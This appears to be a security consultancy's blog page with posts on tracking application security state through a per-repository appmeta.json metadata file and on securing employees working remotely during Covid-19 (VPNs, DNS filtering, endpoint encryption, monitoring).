Security culture is the component of your security program that can maximize compliance. A positive security culture yields employees who are mindful of their role in maintaining company security and confident in their ability to mitigate risk. The combination of acting on your security policies and security culture will position your company to take on bigger, more lucrative clients who expect you to have a comprehensive security program

How to Improve the Security of Your Applications: A Starting Point

When we implement security programs, we often advise clients to build an inventory of their applications. There are a lot of things we can do when we know what our inventory is. We can do this right in the available tools developers are already using. This post covers one way to do this.


When we know what applications we have, we can effectively plan what work needs to be done for each one.

If we have 10 apps with secrets hard coded in the repos, we can track that until all 10 are remediated.

If we have 1,000 apps that need to have dependencies updated, we can start to put a plan in place that allows us to do that over time.

Most of the time, most companies we know, don’t do a great job of tracking information about applications, automating the collection of and making that data accessible or visible.


Most projects we see these days are using some git variant—BitBucketGitLabGitHubProjectLocker, etc. Since developers are already using these platforms to store code, what if we just put the meta information in the repo with the code?

So the imagine if we add a new file in every repo: /appmeta.json.

Now we can write a program to list all of the repos for an org and pull out their security state. Well, as you will see the security state also includes more general information, which is why we called it appmeta instead of security.json. But of course, you could adapt this practice and do all of this yourself with just the properties you care about in the scope you want.


What meta information do we care about?

At a high level:

Security is just part of it.

Consider the following example, which we will go through section by section:

"name": "",
"description": "A platform for implementing security programs.",
"stage": "live",
"team": "SPIO",
"slack": "securityprogramio",
"github": "",
"plan": "",
"adr": "docs/adr/"
"support": {
"slack": "securityprogramchat",
"email": "",
"github": "",
"documentation": ""
"ops": {
"email": "",
"github": "",
"documentation": ""
"continuity": {
"tier": 2,
"comment": "Important for SPIO business but not business critical
for clients.",
"email": "",
"plan": "link"
"security": {
"tier": 1,
"summary": "Contains security information about clients.
Very sensitive.",
"email": "",
"github": "",
"threatmodel": "",
"soxdata": false,
"pcidata": false,
"hippadata": false,
"piidata": true,
"codereview": "2/24/2020",
"training": "4/14/2020",
"linting": "3/01/2020",
"securityrequirements": "2/24/2020",
"securityunittests": "",
"dependencies": "3/05/2020",
"staticanalysis": "",
"dynamicanalysis": "",
"pentest": "planned",
"signal": "",
"audit": ""


At the top level we have:

NameThe name of the project
DescriptionA description
StageWhat lifecycle stage is the system in?
TeamTeam responsible for the project.


Then we have a section about the development of the app. This includes:

SlackThe Development Slack Channel
GitHubThe URL of the project in GitHub
PlanThe location of the development plan
ADRArchitecture decision records

The idea is to make it easy for this information to be collected and distributed beyond the development team, who undoubtedly already has access to these things and hopefully knows about them.


For support, we have similar but different attributes:

SlackThe slack channel for support
EmailHow to reach the support team via email
GithubURL for issues or other project info
DocumentationWhere to get support documentation

If you are using intercom or zendesk or other support tools, you can include those URL’s here so that it is easy for everyone to find support.


In some cases, we may have an ops team that works in a different set of tools. We can capture them here for a given project. In the example in this post, it is basically the same as Dev and Support.


BCP stands for business continuity planning. Having information about the plan, contacts, recovery, tier, etc. makes it easy to standardize and find the right people when needed.

TierThe tier of app. Typically 1 is most critical. (Numeric)
CommentText around the tier.
EmailEmail to use to contact BCP related team.
PlanLink to the response plan.


The security properties reflect the security state of the application.

TierNumeric tier of app. (Programmable)
SummaryText around the tier and app
EmailWho to email about security for the app.
GithubWhere code lives
ThreatModelLink to the threat model (eg. ThreatDragon)
soxdataDoes the app have Sarbanes Oxley related data? (Y/N)
pcidataDoes the app have credit card data (Y/N)
phidataDoes the app have personal health data (Y/N)
piidataDoes the app have personally identifiable information (PII) (Y/N)
codereviewWhen was the last code review? (Date)
trainingWhen was the team last trained on security (OWASP TOP 10) (Date)
lintingWhen was linting last run? (Date)
securityrequirementsSecurity requirements are incorporated up to what date? (Date)
securityunittestsSecurity unit tests are running up to what date? (Date)
dependenciesAutomated dependency checking was run what date? (Date)
staticanalysisWhen was static analysis last run? (Date)
dynamicanalysisWhen was dynamic analysis last run? (Date)
pentestWhen was the last pentest? (Date)
signalSignal function up to date as of? (Date)
auditAudit function up to date as of? (Date)

As you can see there is a lot here. You could remove attributes you don’t care to track. You could add new ones that you want to track.


We are considering building some automation (think a tool written in Golang or JS) that you could point at a GitHub Organization and it would iterate through the repositories, pull this file and compile data - maybe even a semi static web view that would look like a rich inventory… if you’re interested, let us know. Maybe we can give you early access to help test.

How to Stay Secure While Working Remotely

In light of Coronavirus / Covid-19 and in particular, the key CDC recommendation that we implement social distancing (work from home), we wanted to try to write a helpful post about how to stay secure as a remote employee.

Jemurai has always been remote-friendly, with employees sprinkled across the US and we can talk about what makes our remote teams work. This post however, is aiming to focus on the security angles of working from home.

We also put together a checklist for securing your remote work environment that you can download and use across your teams.


The good news is that it is practical to work from home when the appropriate infrastructure is in place.

For some companies that already have a VPN and maybe use primarily cloud-based SaaS tools to get work done, there may be more of a social impact than a technical impact to working remotely. In other words, people can be productive and secure working remotely in this scenario.

There are also a lot of companies that are quite close to being able to unleash a remote workforce with just a few safety measures put in place to ensure that information isn’t exposed or compromised in the process.


The bad news is that there are a lot of companies that aren’t well prepared for lots of remote work. Either they have internal systems that are not easily exposed outside of their office or they have paper trails or other physical security measures that they need to have in place.

Consider also that many classic security tools are running in the corporate network. What happens if most users aren’t really in the network?


The following sections provide detail around different things we need to do to ensure our work environment is safe.

Wireless Networking

Often, employees working at home are using their home wireless network. To ensure that organizational information is not compromised through this process we need to take several steps to secure the WIFI.

When we work from home, even if our WIFI is secure, usually other devices on the home network can see our computer and often our specific location is available to sites and services that we visit.

A VPN is a strong countermeasure for both local computers on the network being able to see our traffic and for obscuring our exact physical location.

It is ideal if the company can offer a VPN service with tested configurations that work with supported devices. If they cannot, there are commercial VPN services (eg. ProtonVPN) and even do it yourself options like Algo, which is what we at Jemurai use.

In security, we talk about confidentiality, availability and integrity. It turns out that availability is an important part of successful remote work. That may mean paying a little more for better internet service.


Optional Enhancements:

Browsing Awareness

We expect to see increased phishing and social engineering activity related to both coronavirus specifically and more people working remotely in general. That means that phishing campaigns and other attempts to manipulate employees are more likely even than they were before. We advocate for specific awareness campaigns against these types of manipulative campaigns.

In some corporate environments, there are countermeasures in place to ensure that employees cannot accidentally browse to a malicious website. Essentially, the corporate network has a directory (DNS) that your computer uses to look up where it is going to visit and the directory contains information about “bad” or “malicious” sites and doesn’t let you go there.

Sometimes the corporate protections work if you are on a company VPN.

There are also public and free DNS services that can also protect you from malicious URL’s, including Quad9.


Physical Environment

It sounds obvious, but when you are working from home your conversations are not private to a company audience and your desk is not private from casual observers. Whether it is your spouse, a cleaning lady, your kids friends, or a relative at a party, you probably don’t control or want to watch your physical environment at home the same way it is managed in an office space.

Most companies implement a clean desk policy anyway to ensure that passwords, client data or other sensitive information is never sitting exposed to passersby.


Company Internal Networking

In the event that there are internal services that are not easily exposed, a company will have to do some soul searching and decide how to address this gap.

On the one hand, it is technically possible to expose internal systems using solutions like Citrix, or even VPN. On the other hand, if the remote part of this setup isn’t established yet it may be costly and complicated to set up a solution like that.

It may be that the best approach is to focus on identifying cloud-based alternatives or workflows that do not require the on site systems. On some level, being able to overcome this centralization should be part of a business continuity plan already - where critical systems are identified and ways to use them under changing circumstances are understood and tested.

There are some basic issues that can arise. One is related to group policies, that IT should be pushing out to users. This is a challenge if the user isn’t connecting to a central domain controller. Another concrete example is that security mechanisms like windows event forwarding (WEF) must be set up to report to a place they can reach, and an internal forwarding address won’t be visible from outside.


Endpoint Controls

It is very important that laptops and other work devices used for remote work have encryption enabled. This is true even when employees work in an office, but the risk of a laptop “disappearing” may be higher at home or in other remote locations.

It is also important that systems are patched regularly.

Although tools like AntiVirus and AntiMalware programs are important in the office, they are arguably even more important out of the office because an event, incident or compromise might be much harder to detect at an infrastructure level. Therefore, in an ideal world, we would mandate and enforce that these endpoint controls are in place before connecting to valuable company services.

Commercial VPN tools provide these types of controls but most more open VPN tools do not. The risk we take here should be commensurate with the size of the organization and the sensitivity of the data involved.

To say that another way, use commercial VPN tools that let you enforce endpoint configuration (OS Updated, Programs Patched) if your data is extremely sensitive.



The best rule to use with storage, i.e. where your files live, is to use the same locations when working remotely that you use when on site. This can be a problem if the typical approach is to use a Windows File Share, for example. Sometimes a VPN can provide access to these shared resources, but that requires an enterprise grade managed VPN.

On the other hand, if there are approved storage solutions like Dropbox, Box, Drive or OneDrive, these can be used the same way remotely as they are in person.

That being said, it is important that users do not use personal file storage solutions to work around company shortcomings. This can result in unintended data exposure.


Things Not To Do

There are some things that people naturally do when they want to be productive from home that are not probably a good idea.

These include:

  1. Trying to use Remote Desktop into an onsite computer
  2. Using a LogMeIn or reverse proxy, etc. to get access to a computer “in the network”
  3. Putting their files in a personal dropbox folder to use from home
  4. Using their personal computer for company work without taking the appropriate precautions

Monitoring and Support

To support remote work, there is an onus upon the organization to update and enhance their security monitoring capabilities.

We would generally want to see the detection of:

  1. Any inbound corporate traffic
  2. Outbound traffic to eg. logmein
  3. Unpatched endpoints
  4. Users not using VPN
  5. Security related events


The environment outside the office when employees work remotely is often quite different from the office network.

Many of the same security measures are important in both cases, but out of the office, there is usually less support around technology and “drive by help” may not be accessible. It may be helpful to work through the details and publish specific guidance (even a WFH Policy) for employees to help them navigate this.

We wanted to help companies shifting to remote setups maintain secure work environments so we collected the safety measures into a handy checklist for employees to use when thinking about their setup at home. You can download it here.

Also, feel free to reach out at